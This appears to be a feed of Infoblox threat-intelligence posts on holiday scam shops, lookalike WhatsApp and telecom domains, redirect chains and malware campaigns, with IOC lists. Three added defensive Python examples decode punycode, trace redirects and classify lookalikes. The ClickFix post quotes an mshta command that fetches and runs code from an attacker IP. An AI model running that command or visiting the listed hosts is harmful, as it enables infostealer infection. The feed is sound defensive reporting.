#Infoblox

2025-11-21

🎁 Holiday Gift or Holiday Grift?

As we head toward the season of giving, it seems we've been on the receiving end of some tempting offers on luxury brand items including bags and watches.

"Step right up, bargains galore!?"

✉️ Unsolicited emails flaunting tempting deals with subjects like:

- [Black Friday 2025] Elevate Every Moment – Luxury Watches from $250
- [Black Friday 2025] Elevate Your Style – Louis Vuitton Bags from $200

🔗 Links in these emails use punycode (xn--) internationalized domain names, with Cyrillic text unrelated to the brand they impersonate.

➡️ These domains redirect to, or load resources from, a handful of '.com' domains that do a reasonable job of mimicking the sleek style of luxury brand websites.

💰 As in our earlier post, the checkout process is a familiar tale - passing your PII and payment card details through an intermediate domain which attempts to take payment via a legitimate payment gateway.

Email punycode/IDN examples:
🚫 xn--80aaae9btead2a[.]xn--p1ai
🚫 xn--80aclvcqeaduhb[.]xn--p1ai
🚫 xn--90ahaa0atead2a[.]xn--p1ai
🚫 xn--90askabadrf6a[.]xn--p1ai

Redirect/resource examples:
🚫 lsrox[.]com
🚫 lux-lvs[.]com

Payment intermediate example:
🚫 topcccbook[.]online

Tempted to treat a loved one, or 'bag' yourself a bargain? Whether it's a knockoff or nothing at all, 'watch' out - the only thing you'll be unwrapping is another scam!

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #blackfriday #thanksgiving #holidays
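
Added example (not part of the post above, nor Infoblox code): a small Python decoder for the punycode (xn--) labels listed above, so an analyst can see the Cyrillic U-labels behind the A-labels and check whether a lookalike mixes scripts or contains the impersonated brand. It implements the RFC 3492 decoder directly and can be cross-checked against Python's built-in idna codec. The brand strings and the mixed-script sample label used in the usage note are assumptions for illustration.

```python
"""Decode punycode (xn--) IDN labels and report which Unicode scripts they use.
Added example for the holiday-scam post above; not code from the original page."""
import unicodedata

# RFC 3492 bootstring parameters for punycode.
BASE, TMIN, TMAX, SKEW, DAMP, INITIAL_BIAS, INITIAL_N = 36, 1, 26, 38, 700, 72, 128


def _digit(ch: str) -> int:
    """Map a punycode digit to its value: a-z -> 0..25, 0-9 -> 26..35."""
    if "a" <= ch <= "z":
        return ord(ch) - ord("a")
    if "0" <= ch <= "9":
        return ord(ch) - ord("0") + 26
    raise ValueError(f"invalid punycode digit {ch!r}")


def _adapt(delta: int, numpoints: int, first: bool) -> int:
    """Bias adaptation (RFC 3492 section 6.1)."""
    delta = delta // DAMP if first else delta // 2
    delta += delta // numpoints
    k = 0
    while delta > ((BASE - TMIN) * TMAX) // 2:
        delta //= BASE - TMIN
        k += BASE
    return k + ((BASE - TMIN + 1) * delta) // (delta + SKEW)


def decode_label(label: str) -> str:
    """Decode one A-label ('xn--...') to its U-label; plain ASCII labels pass through."""
    label = label.lower()
    if not label.startswith("xn--"):
        return label
    encoded = label[4:]
    # ASCII characters of the original name precede the last '-'; the rest is the delta stream.
    cut = encoded.rfind("-")
    output = list(encoded[:cut]) if cut >= 0 else []
    stream = encoded[cut + 1:] if cut >= 0 else encoded
    n, i, bias, pos = INITIAL_N, 0, INITIAL_BIAS, 0
    while pos < len(stream):
        oldi, w, k = i, 1, BASE
        while True:  # generalised variable-length integer
            if pos >= len(stream):
                raise ValueError("truncated punycode label")
            digit = _digit(stream[pos])
            pos += 1
            i += digit * w
            t = TMIN if k <= bias else TMAX if k >= bias + TMAX else k - bias
            if digit < t:
                break
            w *= BASE - t
            k += BASE
        bias = _adapt(i - oldi, len(output) + 1, oldi == 0)
        n += i // (len(output) + 1)
        i %= len(output) + 1
        output.insert(i, chr(n))
        i += 1
    return "".join(output)


def decode_idn(domain: str) -> str:
    """Decode every label of a dotted domain name."""
    return ".".join(decode_label(part) for part in domain.split("."))


def scripts(text: str) -> set[str]:
    """Scripts used by the letters in text, read from the first word of each Unicode name."""
    return {
        unicodedata.name(ch, "UNKNOWN").split(" ")[0]
        for ch in text
        if unicodedata.category(ch).startswith("L")
    }


def audit(domain: str, brand: str) -> dict:
    """What a defender wants to know about an IDN lookalike before blocking it."""
    decoded = decode_idn(domain)
    used = scripts(decoded)
    return {
        "domain": domain,
        "decoded": decoded,
        "scripts": sorted(used),
        "mixed_script": len(used) > 1,  # homograph trick: e.g. a Cyrillic letter inside Latin text
        "brand_in_name": brand.lower() in decoded.lower(),
    }


# IOCs from the post above, refanged. The brand string is an assumption for illustration.
HOLIDAY_IOCS = [
    "xn--80aaae9btead2a.xn--p1ai",
    "xn--80aclvcqeaduhb.xn--p1ai",
    "xn--90ahaa0atead2a.xn--p1ai",
    "xn--90askabadrf6a.xn--p1ai",
]

if __name__ == "__main__":
    for ioc in HOLIDAY_IOCS:
        print(audit(ioc, "louis vuitton"))
```

Running it shows each IOC decoding to an all-Cyrillic name under .рф (xn--p1ai) with no trace of the impersonated brand; a constructed mixed-script label such as the A-label of "аpple" (Cyrillic а followed by Latin pple) is reported as `mixed_script`, which is the pattern to alert on in mail and proxy logs.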

2025-11-19

🐾 Paws for thought before shopping this Black Friday!

Black Friday pet food deals might be nothing to sniff at, but watch out for scammers looking to claw at your money.

Alongside the many retail and holiday-themed domains we're tracking, we've seen domains impersonating legit pet food brands (like Royal Canin) with deals many would want to wolf down.

Here's the scam:

- You're browsing for pet food bargains and end up landing on a fake shop offering huge discounts, like one of these lookalikes:

🐶 royalcaninblackfriday[.]com
🐱 royalcaninwebshop[.]com

- You decide to stock up on tasty holiday treats for your furry friend and are prompted to enter your name, address and contact details to 'register' with the site — perhaps only slightly *phishy* so far?

- At checkout, you're prompted to enter your card details, which are passed on in cleartext to a secondary domain with no obvious link to the brand — examples include:

🚫 lesmonaque[.]top
🚫 sincerelytay[.]top

These payment domains often rotate while the fake storefront stays the same, likely to evade detection by the payment gateways they're abusing.

So not only do you risk having your personal and payment card details snaffled by the scammer, they'll also attempt to charge you for goods you're unlikely to receive!

The impact of these scams can be huge — Europol’s recent Operation “Chargeback” uncovered fraud networks causing losses in the hundreds of millions. Different scam, same playbook: stolen card data and abuse of payment systems at scale.

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #blackfriday #thanksgiving #europol

europol.europa.eu/media-press/

2025-11-06

Cloudflare Scrubs Aisuru Botnet from Top Domains List - For the past week, domains associated with the massive Aisuru botnet have repeatedly usur... krebsonsecurity.com/2025/11/cl #internetofthings(iot) #alittlesunshine #cloudflareradar #ddos-for-hire #alexgreenland #matthewprince #webfraud2.0 #googleapple #reneeburton #cloudflare #microsoft #infoblox #aisuru #amazon #epi

2025-10-27

"I'm not a robot" == "Definitely malware" 🤖

We found an active Clickfix campaign, launched in the last month or so, abusing Cloudflare Pages to host fake CAPTCHA and cookie acceptance pages that drops an unknown form of infostealer. In at least one case, we were able to decipher the auto-copied command to be `mshta http://162[.]252.198[.]122/u88n.db`. `mshta` is an oft-abused, legitimate Windows binary, designed to execute Microsoft HTML Application files. Abusing `mshta` in this way is known as a Living off the Land technique, which aids attackers by avoiding possibly suspicious external processes.

IOCs:
complete-it[.]pages[.]dev
194bffb8[.]complete-it[.]pages[.]dev
3508823b[.]complete-it[.]pages[.]dev
4a203a1c[.]complete-it[.]pages[.]dev
5024b712[.]complete-it[.]pages[.]dev
c2bdad14[.]complete-it[.]pages[.]dev
zallw194bffb8[.]complete-it[.]pages[.]dev

complete-step[.]pages[.]dev

consentandverify[.]pages[.]dev
4020d48f[.]consentandverify[.]pages[.]dev
8a80115d[.]consentandverify[.]pages[.]dev
8df7b42f[.]consentandverify[.]pages[.]dev
93d809cd[.]consentandverify[.]pages[.]dev
b8554ed7[.]consentandverify[.]pages[.]dev
ef57b901[.]consentandverify[.]pages[.]dev

consentcookies-verify[.]pages[.]dev

cookiesconsent-and-verify[.]pages[.]dev

cookiesconsent-verify[.]pages[.]dev

cookiesverify-consent[.]pages[.]dev

katdening1[.]pages[.]dev
41d9cc03[.]katdening1[.]pages[.]dev
49c9b97a[.]katdening1[.]pages[.]dev
5cf5132b[.]katdening1[.]pages[.]dev
65436c2d[.]katdening1[.]pages[.]dev
6b18b8ec[.]katdening1[.]pages[.]dev
9a9a4fab[.]katdening1[.]pages[.]dev
b3d195d9[.]katdening1[.]pages[.]dev
knf9u6m4jt[.]katdening1[.]pages[.]dev
naqsb49c9b97a[.]katdening1[.]pages[.]dev

pass-and-verify[.]pages[.]dev
17bd8c89[.]pass-and-verify[.]pages[.]dev
8bbd8571[.]pass-and-verify[.]pages[.]dev
a0c3581a[.]pass-and-verify[.]pages[.]dev
ae16927d[.]pass-and-verify[.]pages[.]dev

pass-to-verify[.]pages[.]dev
0979aa8e[.]pass-to-verify[.]pages[.]dev
18d5944f[.]pass-to-verify[.]pages[.]dev
1beb85a1[.]pass-to-verify[.]pages[.]dev
41aef6ed[.]pass-to-verify[.]pages[.]dev
5741263c[.]pass-to-verify[.]pages[.]dev
58716364[.]pass-to-verify[.]pages[.]dev
616b5904[.]pass-to-verify[.]pages[.]dev
7b57b9c5[.]pass-to-verify[.]pages[.]dev
7d9238bb[.]pass-to-verify[.]pages[.]dev
860e3d0e[.]pass-to-verify[.]pages[.]dev
959b6110[.]pass-to-verify[.]pages[.]dev
cbe42471[.]pass-to-verify[.]pages[.]dev
d3f8f8b3[.]pass-to-verify[.]pages[.]dev
f0d62d80[.]pass-to-verify[.]pages[.]dev

verify-and-pass[.]pages[.]dev

verify-to-go[.]pages[.]dev

References:
virustotal.com/gui/url/70f1913 (the auto-copied URL)
shodan.io/host/162.252.198.122
urlscan.io/result/019a038d-fce
urlscan.io/result/019a0350-762

#infoblox #dns #clickfix #cloudflare #malware #infosec

2025-10-24

When your "privacy browser" comes with a built-in surveillance suite, it's probably not about privacy. Our latest research, in collaboration with UNODC, exposes Vault Viper. You might recognize them as "Baoying Group". They are running one of Asia's largest iGaming networks, BBIN, servicing scam centres and cyber-enabled fraud networks across the region.

At the center is the Universe Browser, promoted as a "privacy" and "anti-censorship" tool for illegal online gambling. In reality, it's a high-risk surveillance and exploitation platform designed to bypass detections, proxy access, and maintain persistent access across what we estimate to be millions of devices.

DNS analysis from Infoblox reveals tens of thousands of domains tied to Vault Viper's vast infrastructure, exposing a unique DNS fingerprint and operational control over their own corner of the internet.

But the story does not end here: BBIN is linked to dozens of commercial ventures - they even had their own airline!

👉 Read the full report here: blogs.infoblox.com/threat-inte

👉 We spoke to Wired to explain how cybercrime evolved: wired.com/story/universe-brows

#CyberThreatIntel #Infoblox #DNS #VaultViper #riskware #Cybercrime #SoutheastAsia #threatintel #threatintelligence #cybersecurity #infosec #infobloxthreatintel #scam #tds #shazhupan #pigbutchering #malware

Downshift 🍁Downshift@mstdn.ca
2025-10-23

The Universe Browser routes all internet traffic through servers in China and “covertly installs several programs that run silently in the background,” according to new findings from network security company Infoblox. The researchers say the “hidden” elements include features similar to malware—including “key logging, surreptitious connections,” and changing a device’s network connections.

wired.com/story/universe-brows

#cyber #security #china #browser #infoblox #malware

2025-10-21

When one trick isn't enough… this actor brings the whole toolbox.

Actors start mixing techniques like a cyber cocktail:

- Cloud abuse with AWS S3 lures
- Algorithmically generated domains (RDGAs) for agility and evasion
- Redirect chains to keep analysts guessing
- TDS filtering to target victims
- Social engineering with fake alerts ("Your cloud storage is full!") or irresistible offers ("Get Netflix for free!")
- Payment scams as the final sting

Here's how it works: The actor is leveraging SMS messages to lure victims into clicking links that point to Amazon S3 buckets. The SMS links are the initial redirection point, silently forwarding the victim to the first bulk registered (RDGA) domain. The redirection is seamless, making it difficult for the victim to notice anything suspicious.

From there, the actor uses multiple RDGA algorithms to generate domains that host scam and scareware campaigns. These domains feature a variety of deceptive themes, such as fake Netflix promotions, "Your Cloud Storage is Full" alerts, or "Failed Payment" warnings.

Once the victim clicks, the redirection chain continues through custom TDS (Traffic Distribution System) domains—also powered by RDGA—before finally landing on a fraudulent payment gateway. Here, victims are tricked into subscribing to fake antivirus products, counterfeit Netflix accounts, or other bogus services.

The top left and right sections showcase different types of lures used in the attack, while the bottom section illustrates how the victim is redirected to rogue payment gateways.

IOCs
protectionsessionactivities[.]top
scanner-detected-protection-network[.]top
internetadvancedsecuritysession[.]autos
detectedservicesoftwareissue[.]autos
cleanalertsafe[.]top
cleanalertsafequick[.]top
cleansafedevicefix[.]top
clean-alert-safe-quick[.]top
quicksaferiskfree[.]top
safe-install-free-faster[.]top
safeinstallfreefaster[.]top
securedsafeservicesecurity[.]autos
quicksaferisk[.]top

#Infoblox #dns #adtech #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #tds #scam
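
Added example (not part of the post above, nor Infoblox code): a hop-by-hop redirect tracer that records every host in a chain like the one described (S3 lure, RDGA scareware domain, TDS, payment page) instead of letting the HTTP client silently follow it. It handles both server-side 3xx `Location` redirects and client-side meta-refresh, stops on loops, and tags each host: S3 bucket hostnames, the scareware wording seen in the IOC list, and the `.top`/`.autos` TLDs the IOCs use (a weak signal, kept as an assumption). The chain it walks offline is constructed to mirror the post's shape; `live_fetch` is the real transport.

```python
"""Walk a redirect chain one hop at a time and tag each host.
Added example for the S3-lure / RDGA / TDS post above; not code from the original page."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
S3_HOST_RE = re.compile(r"(^|\.)s3[.-]([a-z0-9-]+\.)?amazonaws\.com$", re.IGNORECASE)
META_REFRESH_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE)
# Wording taken from the scareware hostnames in the post's IOC list (assumed keyword list).
SCARE_WORDS = ("alert", "protection", "secur", "scanner", "clean", "safe", "detected")
# TLDs used by the listed IOCs; a weak signal on its own (assumption).
WATCH_TLDS = {"top", "autos"}


def tag_host(host: str) -> list[str]:
    tags = []
    if S3_HOST_RE.search(host):
        tags.append("s3-bucket")
    if any(word in host for word in SCARE_WORDS):
        tags.append("scareware-wording")
    if host.rsplit(".", 1)[-1] in WATCH_TLDS:
        tags.append("watch-tld")
    return tags


def next_location(status, headers, body):
    """Server-side (3xx Location) or client-side (meta refresh) redirect target, if any."""
    if status in REDIRECT_CODES and headers.get("location"):
        return headers["location"]
    m = META_REFRESH_RE.search(body or "")
    return m.group(1) if m else None


def trace_chain(url, fetch, max_hops=10):
    """fetch(url) -> (status, headers with lowercase keys, body). Returns one dict per hop."""
    hops, seen = [], set()
    while url and len(hops) < max_hops:
        host = urlsplit(url).hostname or ""
        if url in seen:
            hops.append({"url": url, "host": host, "status": None, "tags": ["loop"]})
            break
        seen.add(url)
        status, headers, body = fetch(url)
        hops.append({"url": url, "host": host, "status": status, "tags": tag_host(host)})
        nxt = next_location(status, headers, body)
        url = urljoin(url, nxt) if nxt else None  # relative Location values are common in TDS hops
    return hops


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # hand the 3xx back to us instead of following it


def live_fetch(url, timeout=10):
    """Real transport for trace_chain; the offline demo below does not use it."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, body
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, ""


# Constructed offline chain: S3 lure -> RDGA scareware domain -> TDS hop -> payment page.
# Only the two scareware hostnames come from the post's IOC list; the URLs are made up.
FAKE_WEB = {
    "https://lure-bucket.s3.amazonaws.com/go.html": (
        200, {}, '<html><meta http-equiv="refresh" content="0;url=https://cleanalertsafe.top/r"></html>'),
    "https://cleanalertsafe.top/r": (302, {"location": "/scan"}, ""),
    "https://cleanalertsafe.top/scan": (
        302, {"location": "https://securedsafeservicesecurity.autos/pay?plan=av"}, ""),
    "https://securedsafeservicesecurity.autos/pay?plan=av": (200, {}, "<html>Subscribe now</html>"),
}


def fake_fetch(url):
    return FAKE_WEB.get(url, (404, {}, ""))


def demo_chain():
    return trace_chain("https://lure-bucket.s3.amazonaws.com/go.html", fake_fetch)


if __name__ == "__main__":
    for hop in demo_chain():
        print(hop["status"], hop["host"], hop["tags"])
```

Swap `fake_fetch` for `live_fetch` to walk a real SMS link from a sandbox. Keep every hop, not just the final page: the S3 bucket and the TDS domains in the middle are the durable IOCs, while the final payment page is the part that rotates.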

2025-10-20

WhatsApp, doc?

We recently observed about 800 lookalike domains impersonating WhatsApp. These domains are all on the .com, .cc, and .cn TLDs and exhibit a few naming patterns:

Randomized short .cc domains:
- whatsqgs[.]cc, whatsqka[.]cc, whatsqys[.]cc

Structured .com domains:
- app-<3 letters>-whatshktw[.]com
- app-<3 letters>-whatsappcc[.]com

Structured .cn domains:
- <4 letters>-wahtsapp[.]cn

These domains were all created within the last 20 days, tops, and given the bulk registration and consistent infrastructure, point to a coordinated campaign. All 800+ domains are hosted in ASN 205960 (KR, 'IP Transit'), share the same nameserver domain (domainnamedns[.]com), and embed a highly-suspicious Chinese analytics loader from aizhantj[.]com (seriously, this thing is weird; check the references below). The sites present fake WhatsApp login/download portals in Chinese, suggesting East-Asian targeting.

Selection of IOCs
app-xfn-whatsappcc[.]com
app-xbb-whatsappcc[.]com
app-wum-whatshktw[.]com
ptjh-wahtsapp[.]com
kemc-wahstapp[.]cn
hzfv-wahstapp[.]cn
iiqu-wahstapp[.]cn
ggeu-wahstapp[.]cn
whatsyuy[.]cc
xjdp-wahstapp[.]cn
yaue-wahstapp[.]cn
zvxd-wahstapp[.]cn

References
urlscan.io/result/0199f335-4b6 (tj.js is the weird analytics GET request)
urlscan.io/result/0199f34a-e9a (the loader itself)
shodan.io/search?query=aizhant

#infoblox #phishing #lookalikes #infosec #threatintel #dns #whatsapp
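
Added example (not part of the post above, nor Infoblox code): a lookalike classifier that catches all three naming patterns listed above with one rule set. Exact brand substrings cover `whatsappcc`; an optimal-string-alignment distance (edits plus adjacent transpositions) covers `wahtsapp` and the double-swap `wahstapp` seen in the IOCs; and a brand-stem check covers `whatsqgs`/`whatshktw`, where only `whats` survives. The allow-list of the brand's own domains is an assumption, and the stem rule is deliberately weak: the post relies on shared ASN, nameserver and loader to confirm those.

```python
"""Score domains as lookalikes of a brand: exact substring, near-typo, or brand stem.
Added example for the WhatsApp lookalike post above; not code from the original page."""

BRAND = "whatsapp"
# The brand's own registrable domains (assumed allow-list).
ALLOW = ("whatsapp.com", "whatsapp.net")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert/delete/substitute plus adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # 'wahtsapp' costs 1, not 2
    return d[len(a)][len(b)]


def tokens(domain: str) -> list[str]:
    """Each label except the TLD, plus its hyphen-separated pieces (single-label suffixes assumed)."""
    labels = domain.lower().strip(".").split(".")[:-1]
    out = []
    for label in labels:
        out.append(label)
        out.extend(p for p in label.split("-") if p and p != label)
    return out


def classify(domain: str, brand: str = BRAND, max_dist: int = 2, stem_len: int = 5) -> list[tuple[str, str]]:
    """Return (token, reason) pairs; an empty list means no lookalike signal."""
    dom = domain.lower().strip(".")
    if any(dom == a or dom.endswith("." + a) for a in ALLOW):
        return []
    reasons = []
    stem = brand[:stem_len]
    for tok in tokens(dom):
        if brand in tok:
            reasons.append((tok, "contains-brand"))
        elif (dist := osa_distance(tok, brand)) <= max_dist:
            reasons.append((tok, f"near-typo:{dist}"))
        elif tok.startswith(stem) and len(tok) > len(stem):
            # 'whatsqgs', 'whatshktw': stem plus random tail. Weak on its own; corroborate
            # with hosting, nameserver and registration data as the post does.
            reasons.append((tok, "brand-stem"))
    return reasons


def triage(domains):
    """Map each flagged domain to its strongest reason (contains > near-typo > stem)."""
    rank = {"contains-brand": 0, "brand-stem": 2}
    out = {}
    for dom in domains:
        reasons = classify(dom)
        if reasons:
            out[dom] = min(reasons, key=lambda r: rank.get(r[1], 1))[1]
    return out


# IOCs from the post above, refanged.
WHATSAPP_IOCS = [
    "whatsqgs.cc", "whatsqka.cc", "whatsqys.cc",
    "app-xfn-whatsappcc.com", "app-xbb-whatsappcc.com", "app-wum-whatshktw.com",
    "ptjh-wahtsapp.com", "kemc-wahstapp.cn", "hzfv-wahstapp.cn", "iiqu-wahstapp.cn",
    "ggeu-wahstapp.cn", "whatsyuy.cc", "xjdp-wahstapp.cn", "yaue-wahstapp.cn", "zvxd-wahstapp.cn",
]

if __name__ == "__main__":
    for dom, why in triage(WHATSAPP_IOCS).items():
        print(f"{dom:32} {why}")
```

Run over a newly-registered-domain feed, `near-typo` hits are worth alerting on directly; `brand-stem` hits are for clustering, which is where the shared nameserver and the `aizhantj[.]com` loader noted above turn a pile of weak matches into one campaign.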

2025-10-20

@shaft

Today it was due to #aws and #infoblox DNS issues.

2025-10-10

It's annoying to wake up Friday motivated to wrap up your week's threat hunting, but instead getting derailed because a quick Google search gives you extra work...

All we wanted to do was make an address change... so a quick search for "o2 address change".

The top results were not to the official site but to 02support[.]info and 02official[.]com. sigh.

The one time there isn't an AI summary to scroll past, it is because there is a scam paying to replace it...

Here's some scans and images.

O2: urlscan.io/result/0199cdf0-688
O2: urlscan.io/result/0199cdf0-632
EE: urlscan.io/result/0199cdf0-845
Tesco Mobile: urlscan.io/result/0196c3d2-5fd
Vodafone: urlscan.io/result/01994ca7-3f2

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #phishing #scam

2025-10-10

Pig butchering scams - also called sha zhu pan - have gained a lot of attention over the last few years. People know these investment scams are connected to human trafficking, but it is less recognized how they relate to illegal gambling and offshore shell companies.

All of this fuels a massive criminal economy.

Thankfully, long-con scam operations on the internet often leave a strong DNS fingerprint. This enables us to connect physically identified scam compounds to domains - it's always the DNS! ;)

blogs.infoblox.com/threat-inte

#dns #threatintelligence #shazhupan #crypto #cybersecurity #threatintel #pigbutchering #scam #infoblox

2025-10-01

We recently unraveled a mystery involving ~30k infected websites, DNS TXT records, and Strela Stealer #malware distribution. A threat actor who has been around since at least Feb 2020 has evolved to distribute malware through misdirection and a complex relay system, leaving defenders unsure where the actual malware is hosted.

And to top it off, we found that part of the campaigns were sent via REM proxy, another threat actor we track via DNS that leverages compromised MikroTik routers. These campaigns were spam messages targeting #german speakers with malicious .svg files.

The attachments had links pointing to the first stage of the malware -- or did they? It turns out the threat actor, which we track as Detour Dog, is playing mind games. That link actually triggers server-side DNS queries and the fun begins.

Here is the paper: blogs.infoblox.com/threat-inte

More nuggets in the replies.

#malware #infostealer #dns #threatintel #cybersecurity #cybercrime #scam #helptds #tds #infosec #infoblox #strelastealer #phishing #spam #remproxy

2025-09-22

Teamwork makes the dream work! The Black Lotus Labs team at Lumen Technologies has published a new report detailing the infrastructure behind the SystemBC botnet and its role in powering the illicit Rem Proxy service. This service allows threat actors to mask their identities behind compromised MikroTik routers deployed in homes and offices worldwide, enabling a range of email and password-based attacks.

Through our collaboration, we’ve confirmed with high confidence that this is the same botnet we reported on back in January. Excellent work, Black Lotus Labs — great investigating!

Read their full report: blog.lumen.com/systembc-bringi

#Infoblox #botnet #dns #phishing #spam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #scam

2025-09-19

We've been observing a trend on Steam involving Chinese-language accounts leaving spam comments on random users' profiles. They range from commenting single emojis to sentences in Chinese that translate to "we should play games together." Upon investigation, these accounts often link to domains that redirect to malicious content.

One such domain, 3pq[.]cc, redirected to a fake chat app interface designed to mimic a messaging platform hosted on jimuzhou[.]top. The messages eventually gave a link to trwonr[.]top, an adult-themed survey page. After completing the survey, it prompted visitors to download an APK file that requested access to invasive permissions, hosted on cxrcedu[.]com.

A pivot on one of the URLs revealed thousands of related domains, all exhibiting similar behavior and infrastructure.

Sample IOCs:
3pq[.]cc
jimuzhou[.]top
trwonr[.]top
cxrcedu[.]com

#Infoblox #dns #rdga #spam #scam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel

Screenshot of a Steam profile where the username contains the domain 3pq[.]cc and the profile picture contains epk[.]cc

2025-09-18

⚠️Researchers expose Vane Viper, a massive malvertising network linked to PropellerAds that posed as legitimate adtech while spreading malware and scams on a global scale. 👀

Read: hackread.com/vane-viper-malver

#CyberSecurity #Malvertising #Infoblox #VaneViper

2025-09-09

Spammers be spamming. But some may lay low for several months before kicking off their operations.

In late August, we started to observe an influx of a spam campaign targeting Japanese users and impersonating popular companies such as American Express, Amazon and SBI, attempting to phish victims for their credit card and other account information. This was almost a year after the actor first created their domains in September 2024.

This is a technique commonly used by threat actors to avoid detection by security teams, since a lot of attention is usually given to domains that are newly registered. The strategy is to lay low for some time, allowing them to slip under the radar before initiating their operations and remain undetected when they do so.

The actor(s) waited until the domains were close to expiring to start using them in the campaign. They have now renewed several of these domains and, well... that may suggest they intend to continue their activities.

The emails usually contain an action button or a fake URL that redirects to links under domains with the pattern <5 to 10 random letters>.cn. Some of the email subjects, along with their translations, are:
- 【SBIポイント進呈】ご利用状況に応じた特典をぜひご確認ください — [SBI Points Award] Please Check Your Benefits Based on Usage
- [American Express] カードの利用が一時停止されました — [American Express] Card Usage Has Been Temporarily Suspended
- 【お知らせ】カード認証更新のお願い — [Notice] Request to Update Card Authentication

Sample of domains: ehpkmn[.]cn, exttyo[.]cn, qdtqq[.]cn, rnsxk[.]cn, sxviius[.]cn, tyslq[.]cn, wbwfm[.]cn

#Infoblox #dns #phishing #spam #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel #japan #rdga #scam

2025-09-08

Aeza Group is still alive and kicking. Following their July sanction, the operators of bulletproof hosting provider Aeza began to migrate some of their infrastructure to a new ASN they created (AS211522 - Hypercore Ltd). However, they're still primarily operating from their original ASN and registering new domains every day. Some recent domains registered in late July/early August on two dedicated Aeza IPs host fake Russian-language download pages for Windows, Chrome, Minecraft, etc. These pages lure users into downloading malicious executable and torrent files that ultimately attempt to steal the user's credentials from web browsers. Some files dropped by these domains were previously associated with Black Basta and Cobalt Strike in May and July 2025.

Sample domains: windows-download[.]net, drivers-windows[.]com, chrome-downloads[.]net, minecraft-game[.]net

#Infoblox #dns #malware #phishing #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #threatintel

2025-09-05

Wanna play a game?
Reboot now… or in five minutes?

Help TDS - a notorious traffic distribution system - has a fresh new illusion — a fake system alert that sets the stage before the tech support scam begins.

It’s not just a pop-up; it’s full-screen psychological priming, blurred just enough to slip past security tools. You’re given a “choice”, but either way, the curtain rises.

Click either button and the show begins: a spoofed full-screen Microsoft virus alert, and a phone number that offers an immediate fix.

The real trick? Victims are already convinced it’s real before the scam even loads.

#Infoblox #dns #phishing #tds #scam #scareware #helptds #threatintel #InfobloxThreatIntel #threatintelligence #cybercrime #cybersecurity #infosec #TechSupportScam #ScamAlert #DontDialTheNumber

Screenshot from a tech support scam showing the need to reboot in order to continue. Either way, the victim is shown a tech support scam.
